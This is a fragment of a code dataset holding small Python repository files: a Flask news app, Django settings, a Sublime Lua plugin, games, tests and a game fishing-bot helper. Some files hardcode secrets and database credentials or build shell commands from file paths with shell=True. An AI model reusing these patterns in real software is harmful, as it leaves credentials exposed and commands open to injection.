internal_model.predict([x])\n prediction_array_with_softmax = tf.nn.softmax(prediction_array)\n return np.argmax(prediction_array_with_softmax)\n\n\ndef categorize_image(decoded_image: bytes) -> np.signedinteger:\n image = Image.open(BytesIO(decoded_image))\n bw_array = transform_to_black_and_white_array(image.getdata())\n\n prediction = predict_label(bw_array)\n\n return prediction\n","repo_name":"RadekLejba/numbers_classification","sub_path":"app/src/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73154204071","text":"import pygame, time, sys\n\npygame.mixer.pre_init(frequency=22050, size=-16, channels=2, buffer=64)\npygame.init()\n\nscreen = pygame.display.set_mode((300, 300))\nclock = pygame.time.Clock()\n\nfps = 60\n\nbpm = 103\n\nkey = False\n\ncolor = (20, 70, 20)\n\nbeat_counter = 0\n\nbeats_pressed = 0\n\ntotal_beats = 1\n\nclap = pygame.mixer.Sound(\"Ste Ingham Synthwave Clap 01.wav\")\nkick = pygame.mixer.Sound(\"Ste Ingham Synthwave Kick 04.wav\")\nshaker = pygame.mixer.Sound(\"shaker-analog.wav\")\n\nshaker.set_volume(0.5)\n\ndrum_beat = [clap, None, shaker, None, kick, None, shaker, None]\n\nBEAT_EVENT = pygame.USEREVENT + 1\n\nactive = False\n\nwhile 1:\n\n # check events\n key = False\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.display.quit()\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_z:\n key = True\n if event.type == BEAT_EVENT:\n if beat_counter == 7:\n beat_counter = 0\n total_beats += 1\n else:\n beat_counter += 1\n \n if drum_beat[beat_counter] != None:\n drum_beat[beat_counter].play()\n\n if beat_counter == 0:\n color = (20, 70, 20)\n elif beat_counter == 4:\n color = (70, 20, 40)\n \n # check input is on beat\n if beat_counter in [0, 1, 7]:\n if key:\n beats_pressed += 1\n color = (200, 170, 90)\n if not(active):\n pygame.time.set_timer(BEAT_EVENT, int((60/bpm)*1000/4))\n active = True\n \n \n\n # render\n screen.fill(color)\n pygame.display.update()\n clock.tick(fps)\n \n","repo_name":"xLainik/TJAJ-jam2021","sub_path":"scr/utility/prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74551956710","text":"from operator import imod\nfrom uuid import uuid4\nfrom user import User\nfrom login_system import LoginSystemInterface\nfrom salary_request_manager import SalaryRequestManager \n\nclass Employee(User):\n def __init__(self, fullName, dob, gender, address, salary, funds, authorizer = LoginSystemInterface):\n super().__init__(fullName, dob, gender, address, authorizer)\n self.empId = str(uuid4())\n self.salary = salary\n self.funds = funds\n\n def requestSalary(self):\n \"\"\"Add a salary request and update funds\"\"\"\n if not self.authorizer.isLoggedIn():\n print('You are not logged in!')\n return\n\n isProcessed, creditAmount = SalaryRequestManager.addSalaryRequest(self.authorizer.getUserName(), self.salary)\n if not isProcessed:\n print('Salary request was not processed! Try again later.')\n return\n\n self.funds += creditAmount\n print('Salary request processed successfully.')\n ","repo_name":"srividya-p/Forcepoint-Training","sub_path":"15-7-22/hospital-app/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"23881690085","text":"from symboboard.settings.base import *\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '1-88lzkged_-+418vdood5wqp2v9*7!k(+&j6)pc6&5fir-3@3'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# ENVIRONMENT CONFIGURATION SETTINGS\nLOCAL_DEV = True\nPRODUCTION = False\n\n\n# For testing use 'AllowAny' option\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.AllowAny',\n ),\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.TokenAuthentication',\n )\n}\n\n\nif LOCAL_DEV:\n ROOT_URLCONF = 'symboboard.urls_dev'\nelif PRODUCTION:\n ROOT_URLCONF = 'symboboard.urls_prod'\n\n\n# Database\n# https://docs.djangoproject.com/en/2.2/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n","repo_name":"nathanbaleeta/symbo-board","sub_path":"symboboard/settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"9386237726","text":"import sys\r\ninput = sys.stdin.readline\r\nn = int(input()) # 명령 수\r\n\r\nstack_ = []\r\nfor _ in range(n) :\r\n msg = list(map(str, input().split()))\r\n if msg[0] == 'push' :\r\n stack_.append(int(msg[1]))\r\n elif msg[0] == 'pop' :\r\n if len(stack_)>0:\r\n print(stack_.pop())\r\n else :\r\n print(-1)\r\n elif msg[0] == 'size' :\r\n print(len(stack_))\r\n elif msg[0] == 'empty' :\r\n if len(stack_) > 0 :\r\n print(0)\r\n else :\r\n print(1)\r\n elif msg[0] == 'top' :\r\n if len(stack_)>0 :\r\n print(stack_[-1])\r\n else :\r\n print(-1)","repo_name":"seungye-kwak/algorithm","sub_path":"백준/Silver/10828. 스택/스택.py","file_name":"스택.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"42567879910","text":"print(\"This is a todo list program.\")\ntasks = []\ndays = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']\ncreate = True\nwhile create:\n activities = []\n ask = input(\"Enter add tasks or stop: (y/n) \")\n if ask.lower() == 'y':\n day = input(\"Enter todya's day of the week: \").title()\n if day in days:\n current_day = {}\n\n addingTasks = True\n while addingTasks:\n new_tasks = input(\"Enter new tasks: \")\n if new_tasks:\n activities.append(new_tasks)\n else:\n addingTasks = False\n current_day[day] = activities\n tasks.append(current_day)\n else:\n create = False\n\nfor task in tasks:\n for k, v in task.items():\n print(f\"{k}:{v}\")","repo_name":"Sirius1998/todo","sub_path":"todo/proto.py","file_name":"proto.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"86284813827","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport numpy as np\nimport pytest\n\nfrom sofia_redux.scan.custom.hawc_plus.info.info import HawcPlusInfo\n\n\n@pytest.fixture\ndef sofia_camera():\n # Just uses HAWC\n info = HawcPlusInfo()\n info.read_configuration('default.cfg')\n camera = info.get_channels_instance()\n camera.data.fixed_index = np.arange(5)\n camera.data.set_default_values()\n return camera\n\n\ndef test_read_pixel_data(sofia_camera, tmpdir):\n camera = sofia_camera.copy()\n row = '1.0 1.0 - 1.0 1.0 1.0 0 1 1 1'\n filename = str(tmpdir.mkdir('test_read_pixel_data').join(\n 'channel_file.dat'))\n with open(filename, 'w') as f:\n print(row, file=f)\n\n camera.read_pixel_data(filename)\n assert filename in camera.info.configuration_files\n\n\ndef test_read_rcp(sofia_camera, tmpdir):\n camera = sofia_camera.copy()\n row = '0 1 2'\n filename = str(tmpdir.mkdir('test_read_pixel_data').join('rcp.dat'))\n with open(filename, 'w') as f:\n print(row, file=f)\n camera.read_rcp(filename)\n assert filename in camera.info.configuration_files\n","repo_name":"SOFIA-USRA/sofia_redux","sub_path":"sofia_redux/scan/custom/sofia/channels/tests/test_camera.py","file_name":"test_camera.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"}
+{"seq_id":"38800486489","text":"import sublime, sublime_plugin\nfrom subprocess import Popen, PIPE, call, STDOUT\nimport sys, time\n\nstate = {}\n\ndef is_server_running(quick=False):\n\n # this is probably enough to see if everything is running\n if quick:\n if \"server\" in state:\n return True\n else:\n return False\n\n if \"server\" in state:\n if state[\"server\"].poll() == None:\n return True\n else:\n return False\n else:\n return False\n\ndef start_server():\n global state\n # print(\"starting server\")\n if not is_server_running():\n # clean up any old instances that may be running...\n stop_server()\n state[\"server\"] = Popen(state[\"server_command\"], shell=True)\n\n # else:\n # print(\"LuaComplete: server already running\")\n\ndef stop_server(): \n # try to cleanly bring it down.\n shutdown = Popen(state[\"client_command\"] + \" -x\", shell=True)\n shutdown.wait(.5)\n\n # if the command fails, and it's still running. terminate it.\n if shutdown.returncode != 0:\n if is_server_running():\n state[\"server\"].terminate()\n\ndef create_completion(completion):\n (name, completion_type) = completion.split(\":\")\n completion_type = completion_type.strip()\n completion = name\n # add the '(' for functions!\n if completion_type.startswith(\"function\"):\n completion = name + \"(\"\n\n # it's a Lua func and params have been found\n # if \"|\" in completion_type\n # doing this for the speed!\n if len(completion_type) >= 10:\n # split out the function params\n params = completion_type[11:].split()\n\n # set the completion type to just the start\n completion_type = completion_type[0:9] + \"()\"\n\n # figure this thing out\n completion = completion + \", \".join([ \"${{{num}:{name}}}\".format(num=num+1, name=val) for (num, val) in enumerate(params)])\n completion = completion + \")\"\n \n # for c funcs, we can't do completion\n else:\n completion = completion + \"$1)\"\n\n\n return \"{0}\\t{1}\".format(name, completion_type), completion\n\n\nclass LuaComplete(sublime_plugin.EventListener): \n def on_query_completions(self, view, prefix, locations):\n position = locations[0]\n scopes = view.scope_name(position).split()\n\n if ('source.lua' not in scopes or state[\"enabled\"] == False):\n return None\n\n # load the server if it's not running.\n if not is_server_running(quick=True):\n start_server()\n\n # we can only autocomplete certain things\n current_char = view.substr(position-1)\n if current_char not in [\":\", \".\", \"[\", \"(\"]:\n return None\n\n # build the main command\n command = \"{client} -i -c {pos}\".format(client=state[\"client_command\"], pos=str(position))\n \n # append the filename if it exists\n file_name = view.file_name()\n if file_name is not None:\n command = command + \" -f '{0}'\".format(file_name)\n\n # get all the window vars\n package_folders = []\n window_vars = view.window().extract_variables()\n if \"folder\" in window_vars:\n package_folders.append(window_vars[\"folder\"])\n\n if state[\"additional_includes\"]:\n package_folders.append(state[\"additional_includes\"])\n\n # did we find a folder to add?\n if package_folders:\n command = command + \" -r '{0}'\".format(';'.join(package_folders))\n\n\n # get the file contents\n file_contents = view.substr(sublime.Region(0, view.size())).encode('utf8')\n \n # send it to the client\n # print(command)\n client = Popen(command, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT)\n # print(file_contents)\n # print(position)\n\n # send communicate on stdin to the client\n output = 
client.communicate(file_contents)[0].decode('utf-8')\n # print(\"returncode\", client.returncode)\n\n if client.returncode == 0:\n view.set_status(\"a\", \"\")\n output = output.splitlines()\n output_type = output[0]\n # print(output_type)\n # main output is on lines 1 and below\n output = output[1:]\n # print(output)\n if output_type == \"table\":\n return [ create_completion(x) for x in output ]\n\n else:\n view.set_status(\"a\", \"The lua-complete client failed to return\")\n # potentially retry the command or restart the server if his happens.\n\n def __exit__(self, type, value, traceback):\n stop_server()\n\n# start and stop are really only used for debug\n# class StartServerCommand(sublime_plugin.ApplicationCommand):\n# def run(self):\n# start_server()\n\n# class StopServerCommand(sublime_plugin.ApplicationCommand):\n# def run(self):\n# stop_server()\n\nclass ClearCacheCommand(sublime_plugin.ApplicationCommand):\n def run(self):\n stop_server()\n start_server()\n\nclass DisableCommand(sublime_plugin.ApplicationCommand):\n def run(self):\n global state\n state[\"enabled\"] = False\n\nclass EnableCommand(sublime_plugin.ApplicationCommand):\n def run(self):\n global state\n state[\"enabled\"] = True\n\ndef plugin_loaded():\n global state\n state[\"settings\"] = sublime.load_settings(\"LuaComplete.sublime-settings\")\n\n # strip out the path/port\n path = state[\"settings\"].get(\"path\")\n if path is None:\n path = \"lua-complete\"\n port = state[\"settings\"].get(\"port\")\n if port is None:\n port = 24548\n\n # figure out if it's enabled\n enabled = state[\"settings\"].get(\"enabled\")\n if enabled is None:\n enabled = True\n\n # setup the command.\n state[\"server_command\"] = \"{path} server -p {port}\".format(path=path, port=port)\n state[\"client_command\"] = \"{path} client -p {port}\".format(path=path, port=port)\n state[\"enabled\"] = enabled\n\n # get any additional include locations\n state[\"additional_includes\"] = state[\"settings\"].get(\"additional_includes\")\n","repo_name":"FourierTransformer/LuaComplete-Sublime","sub_path":"LuaComplete.py","file_name":"LuaComplete.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"}
+{"seq_id":"12147062827","text":"from datetime import datetime\n\nfrom flask import Flask, render_template, abort, redirect, flash, request, url_for\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom forms import NewsForm\n\napp = Flask(__name__)\n# 数据库连接的配置\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:123456@127.0.0.1/flask_news'\napp.config['SECRET_KEY'] = '123123'\n\ndb = SQLAlchemy(app)\n\n\nclass News(db.Model):\n \"\"\" 新闻模型 \"\"\"\n __tablename__ = 'news'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(200), nullable=False, comment='标题')\n img_url = db.Column(db.String(200), nullable=False, comment='主图地址')\n content = db.Column(db.String(2000), nullable=False, comment='新闻内容')\n is_valid = db.Column(db.Boolean, default=True, comment='逻辑删除')\n is_top = db.Column(db.Boolean, default=False, comment='是否置顶')\n created_at = db.Column(db.DateTime, default=datetime.now(), comment='创建时间')\n updated_at = db.Column(db.DateTime, default=datetime.now(), comment='最后修改时间')\n news_type = db.Column(db.Enum('本地', '百家', '娱乐', '军事'), comment='新闻类别')\n\n\n@app.route('/')\ndef index():\n \"\"\" 首页 \"\"\"\n news_list = News.query.filter(News.is_valid == True, News.is_top == True).all()\n return render_template('index.html',\n news_list=news_list)\n\n\n@app.route('/cat//')\ndef cat(news_type):\n \"\"\" 新闻分类页 \"\"\"\n news_list = News.query.filter(News.news_type == news_type, News.is_valid == True).all()\n return render_template('cat.html',\n news_list=news_list,\n news_type=news_type)\n\n\n@app.route('/detail//')\ndef detail(pk):\n \"\"\" 新闻详情页 \"\"\"\n new_obj = News.query.get(pk)\n if new_obj is None:\n abort(404)\n # 新闻是否已经被删除\n if not new_obj.is_valid:\n abort(404)\n return render_template('detail.html',\n new_obj=new_obj)\n\n\n@app.route('/admin/')\n@app.route('/admin//')\ndef admin(page=1):\n \"\"\" 后台管理-新闻首页 \"\"\"\n page_size = 3\n # offset = (page - 1) * page_size\n # page_data = News.query.limit(page_size).offset(offset)\n title = request.args.get('title', '')\n page_data = News.query.filter_by(is_valid=True)\n # 根据标题进行模糊搜索\n if title:\n page_data = page_data.filter(News.title.contains(title))\n page_data = page_data.paginate(page=page, per_page=page_size)\n return render_template('admin/index.html',\n page_data=page_data,\n title=title)\n\n\n@app.route('/admin/news/add/', methods=['GET', 'POST'])\ndef news_add():\n \"\"\" 新增新闻 \"\"\"\n # 手动关闭CSRF保护\n # form = NewsForm(csrf_enabled=False)\n form = NewsForm()\n if request.method == 'POST':\n if form.validate_on_submit():\n news_obj = News(\n title=form.title.data,\n content=form.content.data,\n img_url=form.img_url.data,\n news_type=form.news_type.data\n )\n db.session.add(news_obj)\n db.session.commit()\n print('新增成功')\n flash('新增成功', 'success')\n return redirect(url_for('admin'))\n else:\n flash('您的表单中还有错误,请修改', 'danger')\n print('表单没有通过验证', form.errors)\n return render_template('admin/add.html',\n form=form)\n\n\n@app.route('/admin/news/update//', methods=['GET', 'POST'])\ndef news_update(pk):\n \"\"\" 修改新闻 \"\"\"\n news_obj = News.query.get(pk)\n if news_obj is None:\n abort(404)\n if not news_obj.is_valid:\n abort(404)\n form = NewsForm(obj=news_obj)\n if request.method == 'POST':\n if form.validate_on_submit():\n news_obj.title = form.title.data\n news_obj.content = form.content.data\n news_obj.img_url = form.img_url.data\n news_obj.news_type = form.news_type.data\n news_obj.is_top = form.is_top.data\n news_obj.updated_at = datetime.now()\n db.session.add(news_obj)\n db.session.commit()\n flash('新闻修改成功', 
'success')\n return redirect(url_for('admin'))\n else:\n flash('您的表单中还有错误,请修改', 'danger')\n return render_template('admin/update.html', form=form)\n\n\n@app.route('/admin/news/delete//', methods=['POST'])\ndef news_delete(pk):\n \"\"\" 逻辑删除新闻 \"\"\"\n if request.method == 'POST':\n news_obj = News.query.get(pk)\n # 新闻不存在\n if news_obj is None:\n return 'no'\n # 新闻已经被删除掉了\n if not news_obj.is_valid:\n return 'no'\n news_obj.is_valid = False\n db.session.add(news_obj)\n db.session.commit()\n return 'yes'\n return 'no'\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"liuyaokang/flask_news","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"32340163841","text":"import sys\nimport subprocess\ntry:\n import numpy as np\nexcept ImportError:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install','numpy'])\n import numpy as np\n\ntry:\n import pandas as pd\nexcept ImportError:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install','pandas'])\n import pandas as pd\n\ntry:\n from datetime import datetime, time, timedelta\nexcept ImportError:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install','datetime'])\n from datetime import datetime, time, timedelta\ntry:\n import json\nexcept ImportError:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install', 'json'])\n import json\ndef reader():\n '''\n Inputs:\n None\n Output:\n None\n Function:\n Creates the Route of the Current System from Excel Files\n '''\n shuttle_schedule = pd.read_excel(\"Shuttle Schedule with Targets.xlsx\",sheet_name=2)\n print(shuttle_schedule.head())\n shuttles=shuttle_schedule.columns.to_list()[3:]\n stops=shuttle_schedule['Stop'].to_list()\n stops_id=shuttle_schedule['Stop ID'].to_list()\n print(stops)\n print(shuttles)\n zero=datetime(year=1900,month=1,day=1,hour=0,minute=30)\n temp_data=[]\n new_shuttles=[]\n rray=[]\n bol_list=[1]*100\n for j,bus in enumerate(shuttles):\n route=shuttle_schedule[bus].to_list()\n tim=[]\n r=0\n for i, stop in enumerate(route):\n if type(stop) is str:\n stop=stop[:-4]\n t = datetime.strptime(str(stop), '%H:%M')\n tim.append(float((t-zero).seconds))\n elif type(stop) is float:\n r += 1\n tim.append(np.inf)\n else:\n t= datetime.strptime(str(stop)[:-3], '%H:%M')\n tim.append(float((t-zero).seconds))\n temp_data.append(tim)\n rray.append(r)\n try:\n if shuttles[j][0:-2]==shuttles[j-1]:\n bol_list[j]=0\n temp_data[j-1]=temp_data[j-1]+tim\n rray[j-1]=rray[j-1]+rray[j]\n if shuttles[j][0:-2]==shuttles[j-2]:\n bol_list[j]=0\n temp_data[j-2]=temp_data[j-2]+tim\n rray[j-2]=rray[j-2]+rray[j]\n except:\n pass\n\n\n actual_r=[]\n actual_temp_data=[]\n for i in range(len(temp_data)):\n if bol_list[i]:\n actual_temp_data.append(temp_data[i])\n new_shuttles.append(shuttles[i])\n actual_r.append(rray[i])\n\n final_td=[]\n for i, secs in enumerate(actual_temp_data):\n tim=secs\n sorted_route=np.argsort(tim)\n sorted_route = sorted_route[0:-actual_r[i]]\n route_s=[]\n route_names=[]\n for f,j in enumerate(sorted_route):\n print(j)\n k=int(j)\n if k>=(len(stops_id)):\n k=k-(len(stops_id))\n if k>=(len(stops_id)):\n k=k-(len(stops_id))\n route_s.append(k)\n route_names.append(stops_id[k])\n final_td.append(route_names)\n with open(\"current_routes\", \"w\") as fp:\n json.dump([new_shuttles]+final_td, fp)\n\n\n\n","repo_name":"connormcintee/Route-Optimization","sub_path":"Framework/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"69878419111","text":"import unittest\n\nimport numpy as np\nfrom hypothesis import given, settings, assume\nfrom numpy.testing import assert_allclose\nfrom tmma.normalisation.tmm import two_sample_tmm\n\nfrom .r_helpers import r_edger_calcFactorTMM\nfrom .strategies import uint_counts_array_and_a_lib_size, \\\n uint_counts_array, poisson_counts_array\n\n\nclass HypothesisTestCalcFactorTMM(unittest.TestCase):\n\n @given(uint_counts_array_and_a_lib_size(max_cols=2))\n @settings(max_examples=500, report_multiple_bugs=False)\n def test_two_sample_tmm_uints_and_random_library_size(self, counts_lib_size):\n \"\"\"\n Given random unsigned integer counts and a random library size\n Check if the output is the same as edgeR's.\n :param counts_lib_size:\n :return:\n \"\"\"\n\n counts, lib_size = counts_lib_size\n\n obs = counts[:, 0].copy()\n ref = counts[:, 1].copy()\n\n lib_size_obs, lib_size_ref = lib_size\n\n r_answer = r_edger_calcFactorTMM(obs, ref,\n lib_size_obs=lib_size_obs,\n lib_size_ref=lib_size_ref)\n\n # No point testing bugs in R\n assume(not np.isinf(r_answer))\n assume(not np.isnan(r_answer))\n\n py_answer = two_sample_tmm(obs, ref,\n lib_size_obs=lib_size_obs,\n lib_size_ref=lib_size_ref)\n assert_allclose(r_answer, py_answer, rtol=1e-6)\n\n @given(uint_counts_array(max_cols=2).filter(lambda x: (np.sum(x, axis=0) > 0).all()))\n @settings(max_examples=500, report_multiple_bugs=False)\n def testtwo_sample_tmm_uints_only(self, counts):\n \"\"\"\n Given random unsigned integer counts,\n check if the output is the same as edgeR's.\n :param counts:\n :return:\n \"\"\"\n\n obs = counts[:, 0]\n ref = counts[:, 1]\n\n r_answer = r_edger_calcFactorTMM(obs, ref)\n # No point testing bugs in R\n assume(not np.isinf(r_answer))\n assume(not np.isnan(r_answer))\n\n py_answer = two_sample_tmm(obs, ref)\n\n assert_allclose(r_answer, py_answer, rtol=1e-6)\n\n @given(poisson_counts_array(max_cols=2).filter(lambda x: (np.sum(x, axis=0) > 0).all()))\n @settings(max_examples=500, report_multiple_bugs=False)\n def testtwo_sample_tmm_poisson_only(self, counts):\n \"\"\"\n Given random poisson counts,\n check if output matches edgeR.\n\n :param counts:\n :return:\n \"\"\"\n obs = counts[:, 0]\n ref = counts[:, 1]\n\n r_answer = r_edger_calcFactorTMM(obs, ref)\n # No point testing bugs in R\n assume(not np.isinf(r_answer))\n assume(not np.isnan(r_answer))\n\n py_answer = two_sample_tmm(obs, ref)\n # Allow to differ by 2/100th\n assert_allclose(r_answer, py_answer, rtol=0, atol=2e-2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"lukauskas/tmma","sub_path":"tests/edger_compatibility/test_calc_factor_tmm.py","file_name":"test_calc_factor_tmm.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"33879378965","text":"import re\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import ValidationError\n\n\nclass BarcodeRule(models.Model):\n _inherit = 'barcode.rule'\n\n def _default_encoding(self):\n return 'gs1-128' if self.env.context.get('is_gs1') else 'any'\n\n encoding = fields.Selection(\n selection_add=[('gs1-128', 'GS1-128')], default=_default_encoding,\n ondelete={'gs1-128': 'set default'})\n type = fields.Selection(\n selection_add=[\n ('quantity', 'Quantity'),\n ('location', 'Location'),\n ('location_dest', 'Destination location'),\n ('lot', 'Lot number'),\n ('package', 'Package'),\n ('use_date', 'Best before Date'),\n ('expiration_date', 'Expiration Date'),\n ('package_type', 'Package Type'),\n ('pack_date', 'Pack Date'),\n ], ondelete={\n 'quantity': 'set default',\n 'location': 'set default',\n 'location_dest': 'set default',\n 'lot': 'set default',\n 'package': 'set default',\n 'use_date': 'set default',\n 'expiration_date': 'set default',\n 'package_type': 'set default',\n 'pack_date': 'set default',\n })\n is_gs1_nomenclature = fields.Boolean(related=\"barcode_nomenclature_id.is_gs1_nomenclature\")\n gs1_content_type = fields.Selection([\n ('date', 'Date'),\n ('measure', 'Measure'),\n ('identifier', 'Numeric Identifier'),\n ('alpha', 'Alpha-Numeric Name'),\n ], string=\"GS1 Content Type\",\n help=\"The GS1 content type defines what kind of data the rule will process the barcode as:\\\n * Date: the barcode will be converted into a Odoo datetime;\\\n * Measure: the barcode's value is related to a specific UoM;\\\n * Numeric Identifier: fixed length barcode following a specific encoding;\\\n * Alpha-Numeric Name: variable length barcode.\")\n gs1_decimal_usage = fields.Boolean('Decimal', help=\"If True, use the last digit of AI to determine where the first decimal is\")\n associated_uom_id = fields.Many2one('uom.uom')\n\n @api.constrains('pattern')\n def _check_pattern(self):\n gs1_rules = self.filtered(lambda rule: rule.encoding == 'gs1-128')\n for rule in gs1_rules:\n try:\n re.compile(rule.pattern)\n except re.error as error:\n raise ValidationError(_(\"The rule pattern \\\"%s\\\" is not a valid Regex: \", rule.name) + str(error))\n groups = re.findall(r'\\([^)]*\\)', rule.pattern)\n if len(groups) != 2:\n raise ValidationError(_(\n \"The rule pattern \\\"%s\\\" is not valid, it needs two groups:\"\n \"\\n\\t- A first one for the Application Identifier (usually 2 to 4 digits);\"\n \"\\n\\t- A second one to catch the value.\",\n rule.name))\n\n super(BarcodeRule, (self - gs1_rules))._check_pattern()\n","repo_name":"odoo/odoo","sub_path":"addons/barcodes_gs1_nomenclature/models/barcode_rule.py","file_name":"barcode_rule.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":31745,"dataset":"github-code","pt":"71"}
+{"seq_id":"23068225926","text":"import pygame\n\nfrom settings import Settings\nfrom ship import Ship\nimport game_functions as gf\nfrom pygame.sprite import Group\nfrom game_stats import GameStats\nfrom button import Button\nfrom scoreboard import Scoreboard\n\ndef run_game():\n # 初始化游戏并创建一个屏幕对象\n pygame.init()\n ai_settings = Settings()\n screen =pygame.display.set_mode((ai_settings.screen_width,ai_settings.screen_height))\n pygame.display.set_caption(\"Alien Invasion\")\n # 创建一艘飞船\n ship = Ship(ai_settings,screen)\n # 创建一个用于存储子弹的编组\n bullets = Group()\n aliens = Group()\n # 创建一群外星人群\n gf.create_fleet(ai_settings,screen,ship,aliens)\n # 创建一个用于存储游戏统计信息的实例\n stats = GameStats(ai_settings)\n sb = Scoreboard(ai_settings,screen,stats)\n # 创建Play按钮\n play_button = Button(ai_settings,screen,\"Play\")\n\n\n\n #开始游戏的主循环\n while True:\n #监视键盘和鼠标事件\n gf.check_events(ai_settings,screen,ship,bullets, stats, play_button, aliens,sb)\n if stats.game_active:\n # 更新飞船\n ship.update()\n if ai_settings.is_const_shoot:\n gf.fire_bullet(ai_settings,screen,ship,bullets)\n gf.update_bullets(ai_settings, screen, ship, aliens, bullets,stats,sb)\n gf.update_aliens(ai_settings, aliens, ship, stats, screen, bullets, sb)\n #绘制屏幕\n gf.update_screen(ai_settings,screen,ship,bullets,aliens, stats, play_button,sb)\n\nrun_game()\n","repo_name":"youthnone/alien_invasion","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73257554791","text":"import cv2\nimport numpy as np\nimport pyautogui as gui\n\nfrom time import sleep\n\ndef findTempl(_template_name, _threshold, _region):\n\n screen = gui.screenshot(region=_region)\n screen = cv2.cvtColor(np.array(screen), cv2.COLOR_RGB2BGRA)\n\n templ = cv2.imread('templates/'+_template_name+'.png', cv2.IMREAD_UNCHANGED)\n rectangles = []\n\n result = cv2.matchTemplate(screen, templ, cv2.TM_CCOEFF_NORMED)\n ypos, xpos = np.where(result >= _threshold)\n height, width = templ.shape[:2]\n for (x, y) in zip(xpos,ypos):\n rectangles.append([x, y, width, height])\n rectangles.append([x, y, width, height])\n\n rectangles, weights = cv2.groupRectangles(rectangles, 1, 0.8)\n\n for (x, y, w, h) in rectangles:\n cv2.rectangle(screen, (x, y), (x+w, y+h), (255,255,255), 2)\n\n cv2.imshow('View', screen)\n cv2.waitKey(200)\n\n return rectangles\n\ndef foundTempl(_template_name, _threshold, _region):\n rects = findTempl(_template_name, _threshold, _region)\n return len(rects) > 0\n\ndef moveMouseFTP(_vec, _durInSec):\n cent = (gui.size()[0]/2, gui.size()[1]/2)\n target = (cent[0] + _vec[0], cent[1] + _cent[1])\n gui.moveTo(traget, _durInSec)\n\ndef waitCountdown(_ticks, _interval):\n for i in range(_ticks):\n print(_ticks-i)\n sleep(_interval)\n\ndef screamImBotter():\n messages = []\n messages.append(\"I'm a botter. Report me!\")\n messages.append(\"I use an educational bot for an unfair advantage!\")\n messages.append(\"I run a bot script atm. Report me!\")\n messages.append(\"I'm using a fishing bot, I'm not allowed to.\")\n for line in messages:\n gui.press(\"enter\")\n for char in line:\n gui.press(char)\n gui.press(enter)\n","repo_name":"linozuber/notFishing","sub_path":"botutils.py","file_name":"botutils.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
